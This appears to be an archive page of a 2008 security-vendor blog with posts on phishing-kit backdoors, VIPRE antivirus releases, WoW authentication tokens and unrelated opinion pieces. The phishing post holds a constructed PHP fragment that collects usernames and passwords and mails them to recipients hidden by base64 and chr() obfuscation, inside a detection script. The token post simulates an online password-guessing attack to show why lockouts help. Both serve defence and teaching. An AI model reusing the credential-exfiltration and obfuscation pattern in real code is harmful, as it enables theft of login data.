Phish kits: No such thing as a free lunch

Not much news to those who track phish kits, but a bit of poetic justice here in this academic paper:

The most recent step in the commoditization of phishing was the distribution of free phishing kits. These kits are actively advertised and distributed at no charge. However, as the economist Milton Friedman would have pointed out [6], there is no free lunch in the underground economy. Often, free phishing kits hide backdoors through which the phished information is sent to recipients (probably the original kits’ authors) other than the intended ones. In other words, far from being a display of generosity on behalf of the authors, free phishing kits respond to rational economical motivations. That is, kits’ authors minimize the effort and risks associated with deploying the phishing site and attracting victims, and maximize their return on investment by harvesting the work of unwitting users.

Link: html, pdf (via John LaCour at Mark Monitor)
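
The backdoor the paper describes is usually nothing more than a second recipient hidden in the kit's PHP source, typically wrapped in base64_decode() or built out of chr() calls so that a casual reader of the file sees only the address the "customer" typed in. The script below is an added example, not code from the paper or from this blog, that scans a kit file for plain-text e-mail addresses and for addresses decoded from those two obfuscations, then reports any recipient that does not appear in the clear. The PHP fragment it scans is constructed for illustration; the addresses in it are placeholders.

```python
import base64
import re

# Constructed PHP fragment in the style of a phishing kit's "send the loot" page.
# The kit operator sees one address in plain text; two more are obfuscated.
SAMPLE_KIT = r'''<?php
$ip = getenv("REMOTE_ADDR");
$message .= "Username: ".$_POST['user']."\n";
$message .= "Password: ".$_POST['pass']."\n";
$message .= "IP: ".$ip."\n";
$recipient = "operator@example.net";
mail($recipient, "Login Info", $message, $headers);
$b = base64_decode("YXV0aG9yQGV4YW1wbGUub3Jn");
mail($b, "Login Info", $message, $headers);
$c = chr(104).chr(105).chr(100).chr(100).chr(101).chr(110)."@example.com";
mail($c, "Login Info", $message, $headers);
header("Location: http://www.example.net/");
?>'''

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
# A PHP concatenation chain made only of chr() calls and string literals.
ATOM = r"""(?:chr\(\d+\)|"[^"\n]*"|'[^'\n]*')"""
CHAIN = re.compile(ATOM + r"(?:\s*\.\s*" + ATOM + r")*")
TOKEN = re.compile(r"""chr\((\d+)\)|"([^"\n]*)"|'([^'\n]*)'""")
MAIL_CALL = re.compile(r"\bmail\s*\(")


def decode_chain(expr: str) -> str:
    """Evaluate a PHP expression of the form chr(n).'lit'."lit"... to a string."""
    out = []
    for m in TOKEN.finditer(expr):
        code, dq, sq = m.groups()
        if code is not None:
            out.append(chr(int(code)))
        else:
            out.append(dq if dq is not None else sq)
    return "".join(out)


def find_recipients(src: str) -> dict:
    """Return the visible addresses, the addresses only reachable after
    de-obfuscation, and how many mail() calls the kit makes."""
    visible = set(EMAIL.findall(src))
    decoded = set()
    for m in B64_CALL.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        decoded.update(EMAIL.findall(text))
    for m in CHAIN.finditer(src):
        if "chr(" in m.group(0):    # plain literals were already caught by EMAIL
            decoded.update(EMAIL.findall(decode_chain(m.group(0))))
    return {
        "visible": visible,
        "hidden": decoded - visible,
        "mail_calls": len(MAIL_CALL.findall(src)),
    }


if __name__ == "__main__":
    report = find_recipients(SAMPLE_KIT)
    print("mail() calls :", report["mail_calls"])
    print("visible      :", sorted(report["visible"]))
    print("hidden       :", sorted(report["hidden"]))
```

A mismatch between the number of mail() calls and the number of visible recipients is itself a strong signal even before decoding anything. Real kits also hide addresses behind hex escapes, str_rot13(), gzinflate() or an eval() of fetched code, so treat this as the first pass of a scanner rather than a complete one.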

Alex Eckelberry

Vipre Enterprise webcast next Tuesday

I’ll be holding a webcast next Tuesday on the upcoming enterprise version of VIPRE. Feel free to drop by.

From our marketing team:

As part of its ongoing efforts to address the rapidly evolving malware landscape facing enterprises, Sunbelt Software introduces VIPRE Enterprise™ – a completely new solution that combines antivirus, antispyware, anti-rootkit and other technologies into a seamless, tightly-integrated product.

Join Sunbelt Software on Tuesday, July 29, 2008 at 2:00pm EDT for a first look at VIPRE Enterprise and learn how Sunbelt started with a blank slate to design a new, next-generation antivirus and antispyware technology to deal with today’s malware in the most comprehensive, highly efficient manner. The result is a clean, fast, and powerful anti-malware solution developed ‘by admins for admins’.

VIPRE Enterprise is designed to optimize overall performance by melding antivirus and antispyware together into one, single, powerful engine. This combination of technologies gives you high-performance software that doesn’t slow down users’ PCs, is low on system resources, and makes it easy for you to protect your network.

When: Tuesday, July 29, 2008 2:00 PM (EDT)

Please register here: http://www.sunbeltsoftware.com/rd/?id=080722WC-VE_webcast_July29

(VIPRE Enterprise is also scheduled to ship next Tuesday.)

Alex Eckelberry

VIPRE Antivirus + Antispyware is now released

Today, I’m pleased to announce that after a very long development and beta testing effort, we have released VIPRE Antivirus + Antispyware. This is the consumer version; the enterprise version will be shipping next week. Company propaganda here, earlier beta announcement (with more information) here. Some reviewers also took an early peek at the beta — including Robert Vamosi at CNET and John Hawes at Virus Bulletin.

Those who have been following this blog may have read some of my prior postings, which started out with a blog post early last year entitled Evolving the Antimalware Technology Model. In that blog post, I discussed how antivirus products have had to adapt to a rapidly changing environment.

The flood of malware these days is just mind-boggling, and the tools needed will require constant reevaluation and new thinking. However, it starts with the platform: Our first task was to make everything from scratch, a blank slate, in order to start off without any legacy code and bloat, using the latest concepts in software development. The second was to create a product that successfully combined antivirus and antispyware functionality, since those two concepts are no longer separate (all users care about is malware, not some semantic argument about the definition of a trojan, or whether a commercial keylogger should be tagged in a system scan, or whether adware is acceptable or not).

But it goes further than just bloat and performance: It’s a problem with our industry. People generally just hate antivirus vendors (I don’t use the term “hate” lightly, as I’ve seen the user surveys). People are angry with resource hogging applications. They’re upset about missed malware, and poor support coming from some distant overseas call center. They’re tired of “scan and scare” tactics. And they’re very upset about price gouging and abuse of the software subscription process (such as the now common and shameful practice of negative option billing — automatically charging your credit card without your explicit permission.)

And the users are right. Something has to change.

VIPRE is not just a product that answers the call for better performance. It’s also about other ideas, such as fair pricing, responsive support, ethical (not “scan and scare”) marketing, responsible subscription practices, and so on.

Ok, off my soapbox. Please feel free to download the trial version and give it a whirl, and don’t hesitate to email me directly with your thoughts.

(The new CounterSpy 3.0 will also be released soon, likely before the end of the month.)

Alex Eckelberry

Email protection for OpenID

A new service by a company called LiquidID is mildly interesting.

One of the potential hazards of OpenID is that your email address might get compromised and then life won’t be fun anymore.

However, if you log in with a LiquidID account, each OpenID site gets its own alias through LiquidID. If the alias gets compromised or starts attracting spam, simply remove that alias.

You can see more here (via ReadRightWeb).

Alex Eckelberry

Another fake MS spam


The file being pushed, free.exe, is an installer for Antivirus XP 2008, a nasty rogue antispyware program.


As we all know, for quite some time now spam has stopped being just a nuisance and become a serious security threat. It used to be that one wouldn’t get too upset if the occasional Viagra email got through a spam filter. That’s no longer the case: Spam is a significant vector for malware infection through malicious links and social engineering, and if something gets through a spam filter — and then makes it past endpoint protection — one can have all kinds of nasty headaches.

Alex Eckelberry
(thanks Adam)


The truth about oil

If you watched the markets today, it’s a big ol’ QED with regard to arguments that oil prices are being driven by speculative activity and hedge funds.

Last week, we could have immediately slashed the price of oil by releasing the Strategic Oil Reserves, hence killing the speculators. In the meantime, there is this argument that allowing offshore drilling will do anything to help prices, a ridiculous idea (all that will happen is oil companies will have leases they can use at their will, changing supply at their whim). Meanwhile, it’s a surprise to some that the biggest single exporter of oil to the US is Canada — almost double that of Saudi Arabia. The American public is the victim of a superb con job.

Whatever, I’ll go back to security now.

Alex Eckelberry

Truste is now for-profit

They went out and raised $10 mill and are now for-profit.

The group is converting to for-profit status and selling the bulk of its newly created stock to Accel Partners, the venture capital firm that backed eBay and Facebook.

The group hopes to use the money to expand by coming up with more automated ways to help smaller Web publishers develop privacy policies.

Terrible idea? Of course. Truste’s reputation in the security industry is certainly quite poor, and this will not help. (For some light reading, you can read some of Ben Edelman’s past posts on the subject of Truste here and here.)

I like the folks over at Truste, and I would only tender one piece of advice to them now that they’re going to be looking for cash: The security game is not an intellectual one, with fair games and trust. There are too many sleazy bastards out there. Start being the tough, uncompromising, hard-assed organization that we expect you to be, and you’ll earn our respect, as well as the respect and trust of the consumer.

Alex Eckelberry

Are Chinese hackers more coordinated than conventional wisdom?

Jumper over at the Dark Visitor (a blog which focuses almost exclusively on Chinese hackers) takes issue with Bruce Schneier’s article, The Truth about Chinese Hackers.

In response to Bruce’s claim that “the hackers are in this for two reasons: fame and glory, and an attempt to make a living”, Jumper responds by saying:

“This is very short sighted. We should be honest here, neither Bruce Schneier nor Heike and I know with absolute certainty what Chinese hackers are doing, who is coordinating them and who might be paying them. Maybe the article shouldn’t be titled “The Truth About Chinese Hacker” because Bruce doesn’t know what the truth is (Heike would have said that he couldn’t handle the truth either, but that’s not my style).

I think a lot of people assume that activity attributed to the PRC is simply based on the IP address. After studying spear phishing attacks, custom malware attacks and the types of data that have been exfiltrated from various NGO targets it seems likely that some entity is coordinating the collection and exploitation of this information. In my humble opinion, there may be more to this than WoW passwords.”

Link here.

Alex Eckelberry

Family Plug Time

My super-smart cousin, Susan Amussen, has written her third historical book, Caribbean Exchanges.

English colonial expansion in the Caribbean was more than a matter of migration and trade. It was also a source of social and cultural change within England. Finding evidence of cultural exchange between England and the Caribbean as early as the seventeenth century, Susan Dwyer Amussen uncovers the learned practice of slaveholding.

As English colonists in the Caribbean quickly became large-scale slaveholders, they established new organizations of labor, new uses of authority, new laws, and new modes of violence, punishment, and repression in order to manage slaves. Concentrating on Barbados and Jamaica, England’s two most important colonies, Amussen looks at cultural exports that affected the development of race, gender, labor, and class as categories of legal and social identity in England. Concepts of law and punishment in the Caribbean provided a model for expanded definitions of crime in England; the organization of sugar factories served as a model for early industrialization; and the construction of the “white woman” in the Caribbean contributed to changing notions of “ladyhood” in England. As Amussen demonstrates, the cultural changes necessary for settling the Caribbean became an important, though uncounted, colonial export.

If you’re as interested in history as I am, feel free to take a gander over to the book’s page here.

Alex Eckelberry

Online Games getting the same security as banks

Being a World of Warcraft player myself since they published the beta a few years ago (at least on weekends, when my wife allows me to play a bit), I’ve noticed recently that you can buy a two-factor authentication token for the game.

No, that’s not a joke:
http://www.blizzard.com/store/details.xml?id=1100000182

I saw people complaining daily that their account had been hacked and all their gold and items stolen. Stolen items and gold? That may sound childish, but in the real world it’s worth real money. There are always buyers who pay real money to have the in-game currency, “gold,” delivered. Players need gold to buy equipment for their character. 1000 World of Warcraft Gold sells for about $39 US. There is always a market for the gold, since some people do not have the time to spend hours collecting gold during gameplay.

The password stealers for such online games significantly outnumber the serial-number stealers for other games. The reason for this is that there are so-called gold-seller companies which not only sell gold but also buy gold for real money from other players so that they can resell it later, in a professional way, for profit. This motivates hobby hackers to create their own keylogging software to earn some extra money. Once an attacker has access to the character, the gold can be sent to themselves via the in-game mail. In most cases, the hackers create a temporary account and simply delete it once the transactions have gone through.

Being able to buy this token as an option will solve some of the security issues, but not all, because when it is optional not everyone will buy it. And the people who pay attention to their computer security anyway (by considering or purchasing this item) are most likely already informed about antivirus solutions and the need to keep them up to date.

The high-risk users will remain as long as this gadget is not bundled with every new game sold. Still, it is highly honorable of Blizzard to improve their security system, even if it’s just for a game. The next step should be a lockout after repeated failed logins in their online account management system; without one, the credentials for the first authentication step can still be brute-forced….
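
To make the two points above concrete (the token stops a stolen or guessed password from being enough on its own, and a lockout stops online guessing of the first factor), here is an added example that is not Blizzard's code and not part of the original post. The post does not say which one-time-password scheme the Blizzard token uses, so the example assumes an event-based HOTP token per RFC 4226 as a stand-in; the account class, the password list and the key are all constructed for the demonstration.

```python
import hashlib
import hmac
import os
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP per RFC 4226: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class GameAccount:
    """Password login with an optional OTP token and an optional failure lockout.

    otp_secret=None means the player never bought the token;
    max_failures=None means the server never locks the account (the state the post complains about).
    """

    def __init__(self, password, otp_secret=None, max_failures=5,
                 lockout_seconds=900, otp_window=10):
        self.salt = os.urandom(16)
        self.pw_hash = self._hash(password, self.salt)
        self.otp_secret = otp_secret
        self.counter = 0                 # next HOTP counter value the server expects
        self.otp_window = otp_window
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.failures = 0
        self.locked_until = 0.0

    @staticmethod
    def _hash(password: str, salt: bytes) -> bytes:
        # Low iteration count keeps the demo fast; tune it up for a real deployment.
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)

    def login(self, password: str, otp: str, now: float) -> str:
        """Return 'ok', 'denied' or 'locked'. `now` is passed in so the demo is deterministic."""
        if now < self.locked_until:
            return "locked"
        if not hmac.compare_digest(self._hash(password, self.salt), self.pw_hash):
            return self._fail(now)
        if self.otp_secret is None:      # first factor only
            self.failures = 0
            return "ok"
        # Accept the next otp_window counters so a few unused token presses do not desync.
        for c in range(self.counter, self.counter + self.otp_window):
            if hmac.compare_digest(hotp(self.otp_secret, c).encode(), otp.encode()):
                self.counter = c + 1     # a used code (and anything before it) is never accepted again
                self.failures = 0
                return "ok"
        return self._fail(now)

    def _fail(self, now: float) -> str:
        self.failures += 1
        if self.max_failures is not None and self.failures >= self.max_failures:
            self.locked_until = now + self.lockout_seconds
            self.failures = 0
        return "denied"


def brute_force(account: GameAccount, guesses, otp: str, now: float = 0.0):
    """Online guessing attack: try each candidate password with the given OTP string.

    Returns (outcome, attempts), where outcome is 'ok' or whatever response ended the run.
    """
    for n, guess in enumerate(guesses, start=1):
        result = account.login(guess, otp, now)
        if result != "denied":
            return result, n
    return "denied", len(guesses)


SECRET = b"12345678901234567890"   # the RFC 4226 test-vector key, used here as a demo value
GUESSES = ["123456", "password", "qwerty", "warcraft", "letmein",
           "dragon", "master", "hunter2", "shadow", "abc123"]   # constructed wordlist


def demo() -> dict:
    results = {}
    # 1. No token, no lockout: the attacker walks the list and gets in on the 8th try.
    results["no_lockout"] = brute_force(GameAccount("hunter2", max_failures=None), GUESSES, "")
    # 2. No token, lockout after 5 failures: the account is locked before the right guess comes up.
    results["lockout"] = brute_force(GameAccount("hunter2", max_failures=5), GUESSES, "")
    # 3. Token enabled, no lockout: even the correct password is useless without a valid code.
    results["no_token"] = brute_force(GameAccount("hunter2", SECRET, max_failures=None), GUESSES, "000000")
    # 4. The legitimate player with the token logs in once; replaying the same code is refused.
    acct = GameAccount("hunter2", SECRET)
    code = hotp(SECRET, 0)
    results["legit"] = acct.login("hunter2", code, now=0.0)
    results["replay"] = acct.login("hunter2", code, now=1.0)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:10s} -> {value}")
```

The lockout here is per account and time-based; a real service would also rate-limit by source address and watch for one address cycling through many accounts, since a per-account counter does nothing against password spraying.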

Signing off, Michael St. Neitzel

Is this abuse?

This is quite disturbing — a passenger apparently gets upset about having to give up her contact lens cleaner to the TSA (which, as I’ve written about before, is itself an idiotic rule). This results in her being tackled to the ground.


I can only see what’s on the video, but in my mind there is absolutely no excuse for treating anyone like this, when it’s clear in the video that she wasn’t doing anything obviously threatening. Police are (or should be) trained in managing difficult situations without resorting to this type of violence.

Alex Eckelberry